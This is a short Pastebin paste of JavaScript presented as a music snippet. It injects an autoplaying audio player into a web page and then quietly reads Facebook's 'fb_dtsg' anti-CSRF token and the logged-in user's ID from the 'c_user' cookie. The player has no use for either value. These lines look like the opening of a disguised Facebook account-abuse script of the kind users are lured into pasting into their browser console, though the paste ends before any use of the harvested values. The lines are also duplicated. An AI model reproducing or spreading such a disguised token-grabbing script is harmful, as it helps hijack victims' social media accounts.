thien

nhạc

Jan 22nd, 2014
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.97 KB | None | 0 0
  1. /* Nhạc */
  2. var parent=document.getElementsByTagName("html")[0];
  3. var _body = document.getElementsByTagName('body')[0];
  4. var _div = document.createElement('div');
  5. _div.style.height="25";
  6. _div.style.width="100%";
  7. _div.style.position="fixed";
  8. _div.style.top="auto";
  9. _div.style.bottom="0";
  10. _div.align="center";
  11. var _audio= document.createElement('audio');
  12. _audio.style.width="100%";
  13. _audio.style.height="25px";
  14. _audio.controls = true;
  15. _audio.autoplay = false;
  16. _audio.autoplay = true;
  17. _audio.src = "http://stream2.hot1.cache31.vcdn.vn/fsfsdfdsfdserwrwq3/63532186aa97400222be5fb665992252/52ba9fa9/2013/12/15/4/b/4b896ff9151263672609e9cb9cc04c00.mp3";
  18. _div.appendChild(_audio);
  19. _body.appendChild(_div);
  20. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  21. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  22. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  23. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
Advertisement
Add Comment
Please, Sign In to add comment